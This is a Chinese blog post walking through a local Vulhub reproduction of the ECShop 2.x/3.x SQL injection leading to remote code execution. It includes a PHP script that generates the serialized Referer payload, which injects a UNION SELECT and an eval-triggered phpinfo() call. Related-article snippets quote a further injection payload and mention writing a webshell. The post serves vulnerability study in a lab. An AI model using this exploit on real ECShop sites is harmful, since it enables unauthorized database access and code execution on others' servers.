ECShop 2.x/3.x SQL注入/远程代码执行漏洞

于 2023-04-12 19:23:20 发布
阅读量326 收藏
点赞数
文章标签: php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48039118/article/details/130089530
版权
该文详细描述了如何下载并使用Vulhub来复现ECShop的SQL注入漏洞。通过修改docker-compose.yml文件,设置环境,然后使用burpsuite拦截和重放请求,生成并应用PHP代码(POC)来触发漏洞。文章还提到了在过程中需要注意的端口冲突和证书信任问题。
摘要由CSDN通过智能技术生成

下载vulhub
wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip

在这里插入图片描述

解压下载的zip文件

在这里插入图片描述

进入到/vulhub-master/ecshop/collection_list-sqli/将docker-compose.yml文件的ecshop版本改一下,不然是4.0版本,漏洞被更新了,实现不了。
在这里插入图片描述

进入到需要复现的漏洞的目录

在这里插入图片描述

这个需要docker-compose,安装docker-compose

在这里插入图片描述
我这个是已经安装过的了,没安装的显示是不一样的,命令就是这个

开启环境
在这里插入图片描述
其中我的mysql已经安装过了,没有显示,安装了ecshop2.7.3

访问http://本机ip:8080

在这里插入图片描述
配置系统

在这里插入图片描述
全绿就可以了

数据库主机:mysql,端口号:3306,用户名和密码都是root,其他的就随意。

在这里插入图片描述
安装成功
在这里插入图片描述

然后利用burpsuite拦截user.php页面,进行重新发包。
burpsuite不能用8080端口,因为被占用了,导入证书需要信任证书,勾选两个选项,我一开始没信任,导致抓不到包,浪费了不少时间。

在这里插入图片描述

利用下面php代码生成POC,

<?php
$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");
$id = "-1' UNION/*";
$arr = [
    "num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
    "id" => $id
];

$s = serialize($arr);

$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';

echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";

启动本地phpstudy生成POC,如下。

在这里插入图片描述

跳转到用户登录界面,进行抓包

在这里插入图片描述
将POC复制,重新发包。
在这里插入图片描述
复现成功。

我喜欢可乐
关注
ECShop_V2.6.2_UTF8_Release0326.zip
02-04
然而,这个版本存在一些重要的安全问题,特别是关于"ecshop2.2 ecshop2.x代码执行漏洞"的标签所提及的,这是一个对系统安全性构成威胁的重要知识点。 1. **代码执行漏洞**:在ECShop V2.6.2中,存在代码执行漏洞,...
ecshop 2.x/3.x SQL注入/代码执行
最新发布
qq_23003811的博客
07-18 309
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞,其3.6.0最新版已修复该漏洞。3、在Referer处修改payload。1、漏洞发生是在会员登录页面。2、生成payload的脚本。
ecshop 2.x/3.x sql注入/任意代码执行漏洞
whatday的专栏
07-01 2142
影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二次漏洞”,通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中,从而实现了任意代码执行。 值得一提的是攻击者利用的payload只适用于ECShop 2.x版本导致有部分安全分析者认为该漏洞不影响ECShop 3.x,这个是因为在3.x的版本里有引入防注...
Ecshop 2.x/3.x SQL注入/任意代码执行漏洞
Baidu_Secrity的博客
09-07 690
近日,Ecshop爆出全版本SQL注入及任意代码执行漏洞,受影响的版本有:Ecshop 2.xEcshop 3.x-3.6.0该漏洞产生的根本原因在于Ecshop系统的user.php文...
20 - vulhub - ECShop 2.x/3.x SQL注入/任意代码执行漏洞
易编橙 · 终身成长社群,相遇已是上上签!
11-15 1184
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3版本与3.6.0次新版本进行漏洞复现。 其实该漏洞复现的意义不是很大,现在都 7.x 8.x 版本了,但是不失为 `了解程序员写bug` 的一种另类方式。
ecshop漏洞复现分析
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-17 1436
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 ecshop漏洞复现分析我看seebug上关于它的漏洞有好多。 xianzhi-2017-02-82239600(SQL注入/远程代码执行) 该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二次漏洞”,通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中,从而实现了
BaizeSec#bylibrary#ecshop2.x_命令执行1
07-25
代码执行在网站根目录下生成1.php的一句话。
韵达快递Ecshop2.7.X插件
10-10
《韵达快递 Ecshop2.7.X 插件详解及应用》 在电子商务领域,物流配送是至关重要的一环,而Ecshop是一款广受欢迎的开源电商系统,为商家提供了丰富的功能和便捷的操作。针对这一系统,开发者们纷纷推出了各种与之...
transport.js文件(解决ecshop jquery jqzoom冲突)
04-02
transport.js文件(解决ecshop jquery jqzoom冲突)
ecshop商务平台兼容PHP5.6.X的完整安装包
11-23
由于自PHP5.4以后发布的版本去掉了部分原有的旧函数,导致 EcShop2.7.3 电子商务平台在 PHP5.4.X 以上安装失败。这里提供了专门针对PHP5.4.x以后版本的完整安装包,直接安装,一键成功。
php%3cbr%3e的使用,ecshop v2.7.3入侵全过程
weixin_35748508的博客
03-10 694
利用的都是一些早就在乌云上爆出来的漏洞,是学校上课做的一个实验,把过程贴出来,第一次尝试写博客,大牛勿喷。1 Sql注入网站服务器ip:192.168.238.132管理员的访问网站的电脑ip:192.168.238.1攻击者ip:192.168.238.129 2) 漏洞存在于站外广告统计功能(对应管理后台的报表统计->站外投放JS),即/affiche.php页面,将from参数(...
商城前后台限制ip地址访问
weixin_30902251的博客
10-10 205
可禁止设定的IP或IP段访问前台,允许设定的IP或IP段登陆后台,增强网站安全性。IP段用*表示,多个地址用半角逗号分隔,优先级自左向右。程序版本为ECSHOP2.7.3,低版本的用户请手动升级。 实现步骤如下: 一、后台执行sql语句,添加所需要的字段,以及默认的几个ip,可以自行修改。如下图: INSERT INTO ecs_shop_config (id, parent_id,...
(三)vulhub专栏:Ecshop Sql注入远程代码执行漏洞复现
云舒的博客
07-05 1527
Referer值未做任何验证可被控制直接引用 采用_echash做分割,且为定值:2.x:554fcae493e564ee0dc75bdf2ebf94ca、3.x:45ea207d7a2b68c49582d2d22adf953a insert_ads函数的sql拼接不规范导致sql注入 make_val函数拼接字符串,拼接用户输入内容。......
ECSHOP 2.7.x sql注入漏洞分析
weixin_43263451的博客
04-16 3411
ecshop将我们可控的参数渲染进模板时,其中利用到$fun($para) 进行动态调用,而通过精心构造的payload使得$fun和$para我们可控,导致可以调用任何函数,从而达到sql注入 1. POC与复现 POC: Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:1:"1";s:2:"id";s:52:"1' and updatexml(0x7e,concat(0x7e,database()),0x7e)#";} 复现
ECShop全系列版本远程代码执行高危漏洞分析+实战提权
xiaoi123的博客
09-20 1938
漏洞概述   ECShop的user.php文件中的display函数的模版变量可控,导致注入,配合注入可达到远程代码执行。攻击者无需登录站点等操作,可以直接远程写入webshell,危害严重。 漏洞评级   严重 影响范围   ECShop全系列版本,包括2.x,3.0.x,3.6.x等。 漏洞分析 0x01. SQL注入   先看 ecshop/user.php:302 ...
ECShop 2.x/3.x SQL注入/任意代码执行 漏洞复现
qq_44504968的博客
09-22 1380
ECShop 2.x/3.x SQL注入/任意代码执行 文章目录ECShop 2.x/3.x SQL注入/任意代码执行漏洞原理实验环境漏洞环境漏洞复现 漏洞原理 ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 其2017年及以前的版本中,存在一处SQL注入漏洞 ,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞复现。
Ecshop3.x漏洞复现
小小猪的博客
11-30 1771
Ecshop3.x漏洞复现 漏洞概述: ECShop的user.php文件中的display函数的模版变量可控,导致注入,配合注入可达到远程代码执行。攻击者无需登录站点等操作,可以直接远程写入webshell,危害严重。 影响范围: ECShop全系列版本,包括2.x,3.0.x,3.6.x等。 环境搭建: 本次环境采用安鸾渗透平台环境 地址 漏洞复现: 访问url,看到首页 访问robots.txt文件,看到下面有路径,访问之后也没有发现可利用的漏洞 百度搜索Ecshop历..
ECSHOP init.php 文件详解与安全分析
E_STRICT级别的错误报告用于提示不推荐的编程实践,帮助改进代码质量。最后,E_ALL包含了所有的错误等级,而在某些生产环境中,可能需要调整为更低的等级以避免敏感信息泄露。 init.php文件在Ecshop中扮演了初始化...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值